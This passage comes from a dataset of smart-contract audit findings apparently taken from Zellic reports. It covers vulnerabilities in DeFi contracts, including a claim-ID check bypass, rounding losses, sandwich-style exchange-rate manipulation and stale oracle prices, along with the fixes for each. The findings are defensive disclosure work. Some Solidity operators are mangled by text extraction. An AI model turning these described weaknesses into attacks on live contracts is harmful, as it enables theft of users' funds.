is 0 and someone tries to execute the borrowAsset, the transaction will revert due to the division by zero. Add a zero check on totalAsset for a more graceful and informative handling of this situation. require(totalAsset !) 0, \u201dTotal Asset is zero\u201d); Zellic Sturdy This issue has been acknowledged by Sturdy, and a fix was implemented in commit ca396917. Zellic Sturdy", + "html_url": "https://github.com/Zellic/publications/blob/master/Sturdy - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Un-encoded claimID can be used in write()", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Coding Mistakes Likelihood: Medium Severity: High : High Users are allowed to create a position in an option through the write() function. This allows passing both the optionID, which corresponds to the option at hand, and the claimID, which corresponds to the claim that a user has when wanting to redeem the position. Currently, the only performed check is that the lower 96 bytes of both the claimID and optionID are identical. function write(uint256 optionId, uint112 amount, uint256 claimId) public returns (uint256) { (uint160 optionKey, uint96 decodedClaimNum) = decodeTokenId(optionId); /) optionId must be zero in lower 96b for provided option Id if (decodedClaimNum !) 0) { revert InvalidOption(optionId); } /) claim provided must match the option provided if (claimId !) 0 &) ((claimId >) 96) !) (optionId >) 96))) { revert EncodedOptionIdInClaimIdDoesNotMatchProvidedOptionId(claimId, optionId); } /) ...)) If an attacker was to call write() with claimID identical to optionID, then they would effectively bypass the current checks, and instead of minting X options and one claim, they could mint X + 1 options and no claim. Zellic Valorem Inc function write(uint256 optionId, uint112 amount, uint256 claimId) public returns (uint256) { uint256 encodedClaimId = claimId; /) @audit-info assume the claimId has already been encoded. if (claimId =) 0) { /) ...)) } else { /) /) check ownership of claim uint256 balance = balanceOf[msg.sender][encodedClaimId]; if (balance !) 1) { revert CallerDoesNotOwnClaimId(encodedClaimId); } /) retrieve claim OptionLotClaim storage existingClaim = _claim[encodedClaimId]; existingClaim.amountWritten += amount; } /) ...)) if (claimId =) 0) { /) Mint options and claim token to writer uint256[] memory tokens = new uint256[](2); tokens[0] = optionId; tokens[1] = encodedClaimId; /) @audit-info assumes encodedClaimId is no longer the same as claimId /) at this point, however, encodedClaimId = claimId = optionId uint256[] memory amounts = new uint256[](2); amounts[0] = amount; amounts[1] = 1; /) claim NFT _batchMint(msg.sender, tokens, amounts, \u201c\u201d); Not minting the accompanying claimNFT leads to indefinitely locking the collateral that was associated with that particular claim. Zellic Valorem Inc We recommend assuring that encodedClaimId can never be the same as optionID. The issue has been fixed in commit 05f8f561. Zellic Valorem Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Rounding error in the redeem mechanism", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: High Severity: High : High During the redeem process, the _getAmountExercised function is called. function _getAmountExercised(OptionLotClaimIndex storage claimIndex, OptionsDayBucket storage claimBucketInfo) internal view returns (uint256 _exercised, uint256 _unexercised) { /) The ratio of exercised to written options in the bucket multiplied by the /) number of options actually written in the claim. _exercised = FixedPointMathLib.mulDivDown( claimBucketInfo.amountExercised, claimIndex.amountWritten, claimBucketInfo.amountWritten ); /) The ratio of unexercised to written options in the bucket multiplied by the /) number of options actually written in the claim. _unexercised = FixedPointMathLib.mulDivDown( claimBucketInfo.amountWritten - claimBucketInfo.amountExercised, claimIndex.amountWritten, claimBucketInfo.amountWritten ); } Due to the nature of how the amounts of exercised and unexercised options are calcu- lated, there is the possibility of a rounding error. This may happen if claimBucketInfo.a mountWritten - claimBucketInfo.amountExercised * claimIndex.amountWritten < cl aimBucketInfo.amountWritten. For example, this applies when the amount that was exercised globally has almost reached the amount that was written globally, and a users written claim is relatively low. In this case, the user will receive no underlying Zellic Valorem Inc tokens, even though they have exercised their options, as well as slightly less exercise tokens than they should have. Depending on the variables of the equations, the user may potentially incur a loss of some or all of their unexercised or exercised tokens. This issue was identified by the Valorem team and verified by Zellic. Valorem imple- mented changes to the calculations in underlying(), redeem(), and claim(), by placing all multiplication before division, to prevent loss of precision. During the remediation phase of the audit, Valorem implemented significant changes to the options\u2019 writing mechanism and overall contract architecture in order to ad- dress the issues that were identified. A thorough examination will be conducted dur- ing the next audit phase to confirm that these changes have effectively resolved the issue. Zellic Valorem Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Writing during the exercise period may lead to arbitrage opportunities", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: Medium Severity: Medium : Medium Currently, a user is allowed to write an option until its expiry date. The exercise period, however, lasts from the exercise to the expiry timestamps of an option. function write(uint256 optionId, uint112 amount, uint256 claimId) public returns (uint256) { /) ...)) Option storage optionRecord = _option[optionKey]; uint40 expiry = optionRecord.expiryTimestamp; if (expiry =) 0) { revert InvalidOption(optionKey); } if (expiry <) block.timestamp) { revert ExpiredOption(optionId, expiry); } /) ...)) } function exercise(uint256 optionId, uint112 amount) external { /) ...)) Option storage optionRecord = _option[optionKey]; if (optionRecord.expiryTimestamp <) block.timestamp) { revert ExpiredOption(optionId, optionRecord.expiryTimestamp); } /) Require that we have reached the exercise timestamp if (optionRecord.exerciseTimestamp >) block.timestamp) { revert ExerciseTooEarly(optionId, optionRecord.exerciseTimestamp); } /) ...)) } Zellic Valorem Inc This overlapping of the writing and exercising periods is prone to arbitrage opportuni- ties. Due to the way the options\u2019 buckets are organized (per day), one can predict that should a specific exercise happen in today\u2019s bucket, writing to it leads to a guaranteed share of the exercise tokens. The arbitrage opportunity does not lead to loss of funds for the user; however, it may lead to unexpected returns in terms of exercise tokens of an option. We recommend either disallowing the writing of options during the exercise period or creating a time buffer such that only buckets that have been written at least one day prior to the current epoch can be exercised. During the remediation phase of the audit, Valorem implemented significant changes to the options\u2019 writing mechanism and overall contract architecture in order to ad- dress the issues that were identified. A thorough examination will be conducted dur- ing the next audit phase to confirm that these changes have effectively resolved the issue. Zellic Valorem Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The _claimIdToClaimIndexArray mapping is not reset in the redeem() function", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: Low Severity: Low : Low The _claim mapping contains the OptionLotClaimIndex object for claimId. This points the claimId to a claim\u2019s indices in the _claimIndexArray array. The information is cre- ated during the _addOrUpdateClaimIndex call. During the redeem call, an internal _getPo sitionsForClaim is called, which in turn retrieves the exercise and underlying amounts of a claim. function redeem(uint256 claimId) external { /) ...)) (uint256 exerciseAmount, uint256 underlyingAmount) = _getPositionsForClaim(optionKey, claimId, optionRecord); /) ...)) } function _getPositionsForClaim(uint160 optionKey, uint256 claimId, Option storage optionRecord) internal view returns (uint256 exerciseAmount, uint256 underlyingAmount) { OptionLotClaimIndex storage claimIndexArray = _claimIdToClaimIndexArray[claimId]; for (uint256 i = 0; i < claimIndexArray.length; i+)) { OptionLotClaimIndex storage = claimIndexArray[i]; OptionsDayBucket storage claimBucketInfo = _claimBucketByOption[optionKey][claimIndex.bucketIndex]; (uint256 amountExercised, uint256 amountUnexercised) = _getAmountExercised(claimIndex, claimBucketInfo); exerciseAmount += optionRecord.exerciseAmount * amountExercised; underlyingAmount += optionRecord.underlyingAmount * amountUnexercised; Zellic Valorem Inc } } The claimId token is burned, but the storage still contains information about it. This information is no longer necessary, and in the expected behavior of the protocol, it will never be re-used. To avoid further unexpected behavior, we recommend deleting the _claimIdToClaim IndexArray[claimId] object altogether. function redeem(uint256 claimId) external { /) ...)) (uint256 exerciseAmount, uint256 underlyingAmount) = _getPositionsForClaim(optionKey, claimId, optionRecord); delete _claimIdToClaimIndexArray[claimId]; /) ...)) } During the remediation phase of the audit, Valorem implemented significant changes to the options\u2019 writing mechanism and overall contract architecture in order to ad- dress the issues that were identified. A thorough examination will be conducted dur- ing the next audit phase to confirm that these changes have effectively resolved the issue. Zellic Valorem Inc", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Incomplete whitelist and blacklist functionality in Resonate- Helper", + "labels": [ + "Zellic" + ], + "body": "Target: ResonateHelper Category: Business Logic Likelihood: Low Severity: Low : Low Once a fxSelector has been added to the whitelist, it cannot later be blacklisted. For example, if the function has not been blacklisted it can be set in the whitelist: function whiteListFunction(uint32 selector) external onlySandwichBot glassUnbroken { require(!blackListedFunctionSignatures[selector], \u201cER030\u201d); whiteListedFunctionSignatures[selector] = true; } And if the function has been whitelisted, it can still be blacklisted: function blackListFunction(uint32 selector) external onlySandwichBot glassUnbroken { blackListedFunctionSignatures[selector] = true; } However, if a function has been whitelisted and is then blacklisted, it will still pass the validation check in proxyCall(\u2026) because function logic only requires the fxSelector to exist in the whitelist: function proxyCall(bytes32 poolId, address vault, address[] memory targets, uint[] memory values, bytes[] memory calldatas) external onlySandwichBot glassUnbroken { for (uint256 i = 0; i < targets.length; i++) { require(calldatas[i].length >) 4, \u201cER028\u201d); /)Prevent calling fallback function for re-entry attack bytes memory selector = BytesLib.slice(calldatas[i], 0, 4); uint32 fxSelector = BytesLib.toUint32(selector, 0); require(whiteListedFunctionSignatures[fxSelector], \u201cER025\u201d); } Zellic Revest Finance ISmartWallet(_getWalletForFNFT(poolId)).proxyCall(vault, targets, values, calldatas); } If the sandwichbot were to mistakenly set a dangerous function (or a function that later turned out to be dangerous) to the whitelist they would not be able to later block that function from being passed to proxyCall(...))). Include logic to blacklist previously whitelisted functions. The blacklist should be im- mediately set to include increaseAllowance and approve as these functions can be used to increase spending allowance, which can trigger transactions that would pass the balance checks on proxyCall(...))) in ResonateSmartWallet. Revest has added in the functionality that would allow for blacklisting of previously whitelisted functions in commit f95f9d5ac4ac31057cef185d57a1a7b03df5f199. The func- tions increaseAllowance and approve have been added to the blacklist in commit f24 28392e0ce022cd6fde9cf41e654879c03119c. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 2 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 ERC20 decimals() method may be unimplemented", + "labels": [ + "Zellic" + ], + "body": "Target: FarmingPool Severity: Informational : Informational Category: Business Logic Likelihood: n/a FarmingPool provides a public method to get the number of decimals of the stakingToken which calls the decimals method of the underlying IERC20 token. However, the EIP-20 standard declares that the decimals method is optional and that other contracts and interfaces should not rely on it being present. According to the excerpt from the EIP-20 standard: Excerpt from the EIP-20 standard The function could revert or return incorrect data. This may pose a composability risk for other contracts that try to interact with the farming pool. Add documentation stipulating that the decimals method is required, or that the im- plementation may be unreliable. The issue has been acknowledged by 1inch, and they will add natspec documentation when it will be implemented. Zellic 1inch Farming", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.3 Undocumented code", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple contracts Severity: Low : Informational Category: Code Maturity Likelihood: n/a The methods in the contracts FarmingPool, IFarmingPool, ERC20Farmable, Farm, IFarm, UserAccounting, FarmAccounting, IERC20Farmable lack documentation in general. There are few or no code comments available. This is a source of developer confusion and a general coding hazard. Lack of doc- umentation, or unclear documentation, is a major pathway to future bugs. It is best practice to document all code. Documentation also helps third-party developers inte- grate with the platform, and helps any potential auditors more quickly and thoroughly assess the code. Since there are plans to eventually merge the contracts into Open- Zeppelin, a widespread community library, the code should be as mature as possible. Document the functions in the affected contracts so that the purpose, preconditions, and semantics are clearly explained. Return values and function arguments should be detailed to help prevent mistakes when calling the functions. The issue has been acknowledged by 1inch, and they will add additional documenta- tion. Zellic 1inch Farming", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.4 Internal discrepancy between function access control", + "labels": [ + "Zellic" + ], + "body": "Target: Farm, FarmingPool Severity: Low : Informational Category: Code Maturity Likelihood: n/a The functions _updateCheckpoint in Farm and FarmingPool both have the private ac- cess control modifier. However, when passed to the startFarming function as a call- back, the parameter type is labeled as internal. A manual review found no security issues with the current implementation. However, while there is no immediate impact, inconsistencies like these can make the code con- fusing and difficult to reason about, which could lead to future bugs. Since there are plans to eventually merge the contracts into OpenZeppelin, a widespread community library, the code should be as mature as possible. Modify the function _updateCheckpoint to be an internal function if this was not a de- liberate design decision. The issue was fixed by 1inch in commit e513e429. Zellic 1inch Farming", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.5 Some methods are not exposed by their interface", + "labels": [ + "Zellic" + ], + "body": "Target: IFarm, IFarmingPool Severity: Low : Informational Category: Code Maturity Likelihood: n/a The interfaces IFarm and IFarmingPool do not expose the following methods from their concrete implementation: IFarm.sol startFarming (Farm.sol) IFarmingPool.sol startFarming decimals (FarmingPool.sol) (FarmingPool.sol) The interfaces also do not expose the onlyOwner setDistributor function, but we as- sume this is part of the intended design. Consumers of this interface will not be able to call the unexposed methods. If this is not the intended design, add the methods to the interface declarations. The issue was fixed by 1inch in commit 29bf4aed. Zellic 1inch Farming", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.2 Slippage/manipulated exchange rates when depositing", + "labels": [ + "Zellic" + ], + "body": "Target: Drops4626 Category: Business Logic Likelihood: High Severity: Medium : Medium Certain vaults contain logic to exchange deposited assets (e.g., WETH) to the vault asset (CEther). The amount of CEther received by the mint called in deposit is determined by the current exchange rate that can be manipulated by minting and redeeming. A MEV user could use these techniques to sandwich a large deposit and extract/steal the deposit of a vault user by following the actions below: The MEV user mints a lot of cETH. The large deposit goes through, but the vault user receives few cETH due to the bad exchange rate. The MEV user redeems the cETH getting back more ETH than they started with, essentially eating into the deposit of the vault user. The deposits/withdrawals of vault users are at risk of being stolen. Add deposit call interfaces that allow users to specifiy minimum exchange rates. Spice Finance Inc. acknowledged and addressed the issue in commit 0d49a0b2 by implementing a slippage limited interface in the SpiceFi4626 contract through which users are supposed to interact with directly. We note that slippage protection is not implemented in the underlying Bend4626 and Drops4626 contracts, which are still po- tentially vulnerable if used directly; our understanding is that those contracts are not intended to be called directly. Zellic Spice Finance Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potentially uninitialized implementation contracts", + "labels": [ + "Zellic" + ], + "body": "Target: Bend4626, Drops4626, SpiceFi4626, Vault Category: Coding Mistakes Likelihood: Informational Severity: Medium : Medium Implementation contracts designed to be called by a proxy should always be initial- ized to prevent potential takeovers. If an implementation contract is not initialized, an attacker could be able to initialize it and perform a selfdestruct, deleting the implementation contract and causing a denial of service. Ensure the implementation contract is always initialized. Following official OpenZeppelin documentation, this can be accomplished by defining a constructor on the contract: ///)) @custom:oz-upgrades-unsafe-allow constructor constructor() { _disableInitializers(); } For more information, refer to these openZeppelin documents. This was remediated in commit 5dfead1b by adding _disableInitializers Zellic Spice Finance Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.4 MaxWithdraw does not account for fees", + "labels": [ + "Zellic" + ], + "body": "Target: SpiceFi4626 Category: Business Logic Likelihood: Low Severity: Low : Low In vault Spice4626, the check for maximum withdrawals can pass but the call to _wit hdraw can still fail because fees are not accounted for. function maxWithdraw(address owner) public view override returns (uint256) { ...)) return paused() ? 0 : _convertToAssets( balanceOf(owner), MathUpgradeable.Rounding.Down ).min(balance); } The code above returns the maximum between the owner\u2019s balance and the liquid capital of the vault. In the case where a user specifies a withdrawal equal to the avail- able vault balance, this check passes; however, later in _withdraw, all of the available capital is used in the call to super.withdraw, but then fee transfers are done, which would revert due to the lack of capital in the vault. function _withdraw(...))) internal override { address feesAddr1 = getRoleMember(ASSET_RECEIVER_ROLE, 0); address feesAddr2 = getRoleMember(SPICE_ROLE, 0); uint256 fees = _convertToAssets(shares, MathUpgradeable.Rounding.Down) - assets; uint256 fees1 = fees.div(2); /) Uses up entire available capital super._withdraw(caller, receiver, owner, assets, shares); /) These calls will fail due to lack of capital. SafeERC20Upgradeable.safeTransfer( IERC20MetadataUpgradeable(asset()), Zellic Spice Finance Inc. feesAddr1, fees1 ); SafeERC20Upgradeable.safeTransfer( IERC20MetadataUpgradeable(asset()), feesAddr2, fees.sub(fees1) ); } In the edge case of a user having a balance corresponding to an amount higher than the capital available in the vault and would like to withdraw close to the maximum possible withdrawal, the withdrawal will revert with an incorrect message. Other smart contracts building on top of SpiceFi will receive incorrect quantities for maxWit hdraws resulting in reverts. Account for the fees in maxWithdraw. This was remediated in commit 37e0d2db by accounting for fees. Zellic Spice Finance Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Potential rounding error", + "labels": [ + "Zellic" + ], + "body": "Target: SpiceFi4626 Category: Coding Mistakes Likelihood: Low Severity: Low : Low The SpiceFi4626:)maxDeposit function computes the maximum amount of assets a user should be allowed to deposit, starting from the maximum amount of shares they are allowed to receive in order to not go above the maximum supply. The conver- sion between shares and assets is performed by rounding up, potentially leading to a slightly higher-than-expected limit. function maxDeposit(address) public view override returns (uint256) { return paused() ? 0 : _convertToAssets( maxTotalSupply - totalSupply(), MathUpgradeable.Rounding.Up ); } It might be possible to deposit slightly more assets than intended into the contract. Round down the conversion from shares to assets. This was remediated in commit bced4a44 by rounding down. Zellic Spice Finance Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/SpiceFi Vaults - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Possible usage of stale price information", + "labels": [ + "Zellic" + ], + "body": "Target: Solana attester, Ethereum and Terra consumer contracts Category: Business Logic Likelihood: High Severity: Critical : Critical The following four separate issues when chained together lead to a critical outcome: attest performs insufficient sanity checks The attest function (from attest.rs) of the Solana attester contract does not enforce any restriction on the publication timestamp of the price being attested. Therefore, it could be leveraged to publish out of date pricing information when the prices have not been updated for a while. Ethereum contract performs insufficient sanity checks The Ethereum contract consuming price attestations does not perform any sanity check on the price publication timestamp. A last-resort check is performed in queryP- riceFeed on the price attestation timestamp. This check is not particularly effective as the attestation timestamp represents when the attestation program attested the price information through Wormhole, not when the price itself was published. Terra contract performs insufficient sanity checks Similar to the ethereum contract, the terra contract does not perform any validation against the price publication timestamp. A check is performed in the query_price_info method against the attestation timestamp but as stated previously, it is not sufficient to determine the liveliness of the pricing data, but merely the liveness of the stream of pricing information. Zellic Pyth Data Foundation Developer documentation misses important safety notice The documentation does not recommend the user to check the publication timestamp when retrieving a price, significantly increasing the likelihood of an unsafe usage of the API. In addition, users cannot retrieve publication timestamp from IPyth interface but instead have to use queryPriceFeed, which is not a part of IPyth. Stale price accounts can be passed to the attester program and reach Pyth users on other blockchain platforms. After discussion with the Pyth team, this category of pub- lishing stale pricing information is considered critical. Pyth users are unlikely to have implemented sanity checks that prevent them from using outdated information since there\u2019s no recommendation to do so in Pyth documentation, and would therefore use the stale data. Recommendation Regarding the attester program: refuse to attest outdated prices, for instance by checking the publish_time field of the PriceAttestation struct Regarding the Ethereum smart contract: If possible, add sanity checks on the price publication timestamp by default to all public facing functions Otherwise, expand IPyth to expose the information required to implement those sanity checks, and clearly document the need for it Regarding the Terra smart contract: Implement sanity checks on the price publication timestamp by default for all public facing functions The finding has been acknowledged by Pyth Data Foundation. Their official response is reproduced below: Pyth Data Association acknowledges the finding and developed a patch for this issue: https://github.com/pyth-network/pyth2wormhole/pull/194 Zellic Pyth Data Foundation https://github.com/pyth-network/pyth2wormhole/pull/196 Zellic Pyth Data Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth2Wormhole - Zellic Audit Report.pdf" + }, + { + "title": "3.2 IPyth interface and implementation do not follow the rec- ommended best practices", + "labels": [ + "Zellic" + ], + "body": "Target: Pyth2Wormhole ethereum contract Category: Code Maturity Likelihood: N/A Severity: Low : Low The documentation for the IPyth public interface suggest the following best practices: Use products with at least 3 active publishers Check the status of the product Use the confidence interval to protect your users from price uncertainty The first recommendation cannot be followed using only the functions exposed by I- Pyth, and the documentation does not elaborate on what additional functions should be used. IPyth exposes the following three functions: function getCurrentPrice(bytes32 id) external view returns (PythStructs. Price memory price); function getEmaPrice(bytes32 id) external view returns (PythStructs. Price memory price); function getPrevPriceUnsafe(bytes32 id) external view returns ( PythStructs.Price memory price, uint64 publishTime); PythStructs.Price does not contain information about how many publishers con- tributed to the given price. A user could still call queryPriceFeed (a public function which is not part of IPyth). This function returns an instance of PythStructs.PriceFeed, a struct that contains fields that can hold the required information. However, internally the contract does not copy this information from the price attes- tation. function newPriceInfo(PythInternalStructs.PriceAttestation memory pa) private view returns (PythInternalStructs.PriceInfo memory info) { info.attestationTime = pa.timestamp; /) [code shortened for brevity] Zellic Pyth Data Foundation /) These aren't sent in the wire format yet info.priceFeed.numPublishers = 0; info.priceFeed.maxNumPublishers = 0; return info; } This comment appears to be incorrect with respect to the attestation program re- viewed by Zellic. The attest function creates instances of the PriceAttestation struct using PriceAttestation:)from_pyth_price_bytes, which does set the num_publishers and max_num_publishers fields. Consumers of Pyth data on Ethereum might not follow the documented best practices and use unreliable price information. Recommendation Modify the IPyth interface to provide a way for Pyth users to read how many publishers were aggregated to compute a given price. Modify newPriceInfo to read from the price attestation the number of publishers that contributed to the price The finding has been acknowledged by Pyth Data Foundation. Their official response is reproduced below: Pyth Data Association acknowledges the finding, but doesn\u2019t believe it has secu- rity implications. However, we may deploy a bug fix to address it. Zellic Pyth Data Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth2Wormhole - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Limited test-suite and code coverage", + "labels": [ + "Zellic" + ], + "body": "Target: Pyth2Wormhole attester contract Category: Code Maturity Likelihood: N/A Severity: Low : Low Pyth Solana attester has only one test for the contract main function, attest (located in pyth2wormhole/client/tests/test_attest.rs). A comprehensive testsuite covering all functionality is very effective in discovering existing bugs and prevent future ones. Recommendation We highly recommend Pyth to develop a comprehensive test-suite with maximum code coverage. The finding has been acknowledged by Pyth Data Foundation. Their official response is reproduced below: Pyth Data Association acknowledges the finding, but doesn\u2019t believe it has secu- rity implications. However, we may deploy a bug fix to address it. Zellic Pyth Data Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/Pyth2Wormhole - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The migrate function can be recalled", + "labels": [ + "Zellic" + ], + "body": "Target: StakeManager Category: Business Logic Likelihood: Medium Severity: Medium : Medium The migrate function is responsible for migrating the state of the StakeManager con- tract when it is bridged to the Ethereum Mainnet. However, the current implementa- tion lacks proper checks, allowing for the _rate to be set to zero, which would allow the function to be called again. function migrate( address _poolAddress, uint256 _validatorId, uint256 _govDelegated, uint256 _bond, uint256 _unbond, uint256 _rate, uint256 _totalRTokenSupply, uint256 _totalProtocolFee, uint256 _era ) external onlyAdmin { require(rate =) 0, \u201dalready migrate\u201d); require(bondedPools.add(_poolAddress), \u201dalready exist\u201d); validatorIdsOf[_poolAddress].add(_validatorId); poolInfoOf[_poolAddress] = PoolInfo( { bond: _bond, unbond: _unbond, active: _govDelegated }); rate = _rate; totalRTokenSupply = _totalRTokenSupply; Zellic StaFi Protocol totalProtocolFee = _totalProtocolFee; latestEra = _era; eraRate[_era] = _rate; } In addition to the obvious impact of the contract being migrated with incorrect values, if the _rate in the migrate function is set to zero, it opens the possibility of the function being called again, potentially causing unintended consequences for the contract. The limited severity in this case is due to the fact that the function can only be called by the contract\u2019s admin, and the admin is a trusted entity. We recommend ensuring that all parameters are comprehensively checked before the migration is allowed to proceed. One way to do this is to implement input valida- tion checks in the migrate function to ensure that only valid and expected values are accepted for migration. Furthermore, we highly recommend to explicitly check the _rate parameter to ensure that it is not set to zero. This issue has been acknowledged by StaFi Protocol, and a fix was implemented in commit 1f980d34. Zellic StaFi Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/StaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Checks to limit parameters missing", + "labels": [ + "Zellic" + ], + "body": "Target: StakeManager Category: Code Maturity Likelihood: Medium Severity: Low : Low Both the init and setParams, migrate functions are used for modifying the contract\u2019s most important state variables, such as the _eraSeconds, the _minStakeAmount, and more. However, both functions lack proper checks to ensure that the parameters are within acceptable ranges or that they are not set to zero. For example, despite the eraSeconds being checked against zero in the setParams func- tion, there is no upper bound check to ensure that the _eraSeconds is not set to a value that is too large to be handled by the contract. function setParams( uint256 _unstakeFeeCommission, uint256 _protocolFeeCommission, uint256 _minStakeAmount, uint256 _unbondingDuration, uint256 _rateChangeLimit, uint256 _eraSeconds, uint256 _eraOffset ) external onlyAdmin { unstakeFeeCommission = _unstakeFeeCommission =) 1 ? unstakeFeeCommission : _unstakeFeeCommission; protocolFeeCommission = _protocolFeeCommission =) 1 ? protocolFeeCommission : _protocolFeeCommission; minStakeAmount = _minStakeAmount =) 0 ? minStakeAmount : _minStakeAmount; rateChangeLimit = _rateChangeLimit =) 0 ? rateChangeLimit : _rateChangeLimit; eraSeconds = _eraSeconds =) 0 ? eraSeconds : _eraSeconds; eraOffset = _eraOffset =) 0 ? eraOffset : _eraOffset; if (_unbondingDuration > 0) { unbondingDuration = _unbondingDuration; emit SetUnbondingDuration(_unbondingDuration); } } Zellic StaFi Protocol The lack of checks on the parameters may result in the contract being set to an invalid state or a state that is not expected by the contract\u2019s users. For example, setting the _eraSeconds to a very large value may result in the contract being unable to handle eras properly, since it would take too long for the contract to progress to the next era. We recommend ensuring that all parameters are comprehensively checked, in a transparent way. One way to do this is to implement input validation checks in the setParams, migrate and init functions to ensure that only valid and expected values are accepted for modification. This issue has been acknowledged by StaFi Protocol, and fixes were implemented in the following commits: 1f980d34 c2053dc3 Zellic StaFi Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/StaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Solidity versioning permits underflow behavior", + "labels": [ + "Zellic" + ], + "body": "Target: All Category: Coding Mistakes Likelihood: Low Severity: Medium : High The contract specifies its version to be pragma solidity >)0.4.25 <0.9.0. This means the contract can be compiled with a version of Solidity that does not perform checked math. It is worth noting that while previous versions of Solidity (up to and including 0.7.x) did not automatically check for overflow and underflow, it was still possible to manually check for and handle such scenarios. However, in the ETH and ERC20 Wasabi pools, balance subtractions such as balance -= optionData.strikePrice were not properly guarded against underflow scenarios, which could result in a user\u2019s available balance being artificially inflated. Starting with Solidity version 0.8.x, the compiler performs automatic overflow and underflow checks, helping to prevent these kinds of issues. Therefore, it is recom- mended to use the latest version of Solidity and follow best practices for safe arith- metic operations to avoid potential issues with underflow and overflow. We recommend version locking to 0.8.x version. This issue has been acknowledged by Wasabi, and a fix was implemented in commit 63ab20b9. Zellic Wasabi", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Usage of transfer to send ETH can prevent receiving", + "labels": [ + "Zellic" + ], + "body": "Target: ETHWasabiPool Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The protocol employs Solidity\u2019s .transfer method to send Ethereum (ETH) to recipi- ents. However, .transfer is limited to a hardcoded gas amount of 2,300, which may not be sufficient for contracts with logic in their fallback function. Consequently, these contracts may revert during the transaction. Additionally, the use of a hardcoded gas stipend may not be compatible with future changes to Ethereum gas costs, posing a potential risk to the protocol\u2019s long-term viability. function withdrawETH(uint256 _amount) external payable onlyOwner { if (availableBalance() < _amount) { revert InsufficientAvailableLiquidity(); } address payable to = payable(_msgSender()); to.transfer(_amount); emit ETHWithdrawn(_amount); } The withdrawETH function sends ETH to the designated recipient (msg.sender) using the to.transfer(_amount) method. However, if the recipient is a contract that incurs computational costs exceeding 2,300 gas upon receiving ETH, it will be unable to receive the funds. This poses a risk of failed transactions for contracts that have high gas costs, potentially leaving the designated recipient without access to their funds. We suggest using the .call method to send ETH and verifying the return value to confirm a successful transfer. Solidity by Example offers a helpful guide on choosing the appropriate method for sending ETH, which can be found here: https://solidity- by-example.org/sending-ether/. Furthermore, since the withdrawETH function does not intend to receive ETH, the paya ble keyword can be removed. Zellic Wasabi This issue has been acknowledged by Wasabi, and a fix was implemented in commit 01ee7727. Zellic Wasabi", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Protocol does not check return value of ERC20 swaps", + "labels": [ + "Zellic" + ], + "body": "Target: WasabiPoolFactory, ERC20WasabiPool Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The ERC20 standard requires that transfer operations return a boolean success value indicating whether the operation was successful or not. Therefore, it is important to check the return value of the transfer function before assuming that the transfer was successful. This helps ensure that the transfer was executed correctly and helps avoid potential issues with lost or mishandled funds. If the underlying ERC20 token does not revert on failure, the protocol\u2019s internal ac- counting will record failed transfer operations as successful. We recommend implementing one of the following solutions to ensure that ERC20 transfers are handled securely: 1. Utilize OpenZeppelin\u2019s SafeERC20 transfer methods, which provide additional checks and safeguards to ensure the safe handling of ERC20 transfers. 2. Strictly whitelist ERC20 coins that do not return false on failure and revert. This will ensure that only safe and reliable ERC20 tokens are used within the protocol. In general, it is important to exercise caution when integrating third-party tokens into the protocol. Tokens with hooks and atypical behaviors of the ERC20 standard can present security vulnerabilities that may be exploited by attackers. We recommend thoroughly researching and reviewing any tokens that are considered for integration and performing a comprehensive security review of the entire system to identify and mitigate any potential vulnerabilities. This issue has been acknowledged by Wasabi, and a fix was implemented in commit 0b7bffe6. Zellic Wasabi", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Centralization risks In the following three findings, the audit has identified centralization risks that users of the protocol should be aware of. Although the impact of these risks is currently mitigated by Wasabi\u2019s role as the deployer and owner of the contracts, if the owner\u2019s keys were to be compromised or the owner becomes malicious, the impact on the protocol could be significant. To address this risk and increase user confidence and 